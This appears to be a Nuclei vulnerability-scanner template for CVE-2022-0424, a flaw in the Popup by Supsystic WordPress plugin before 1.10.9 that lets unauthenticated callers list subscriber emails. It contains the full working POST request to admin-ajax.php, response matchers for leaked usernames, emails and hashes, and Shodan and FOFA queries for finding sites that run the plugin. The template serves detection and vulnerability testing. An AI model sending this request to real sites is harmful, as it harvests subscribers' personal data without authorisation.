id: CVE-2022-0424

info:
  name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
  author: Kazgangap
  severity: medium
  description: |
    The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
  remediation: Fixed in 1.10.9
  reference:
    - https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0424
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-0424
    cwe-id: CWE-306
    epss-score: 0.01488
    epss-percentile: 0.86805
    cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: supsystic
    product: popup
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/popup-by-supsystic
    fofa-query: body=/wp-content/plugins/popup-by-supsystic
    publicwww-query: "/wp-content/plugins/popup-by-supsystic"
  tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"id":"'
          - 'username":"'
          - 'email":'
          - 'hash":"'
          - '_wpnonce'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ae353cf33f8d15e38265c2427ecce8e3066f6773a07cfe3c63352f886f6b8424022100b95faab2e54951afdeb5de9b658305b20c7c8d0e846ea7088c2bd6b1e8cc3746:922c64590222798bb761d5b6d8e72950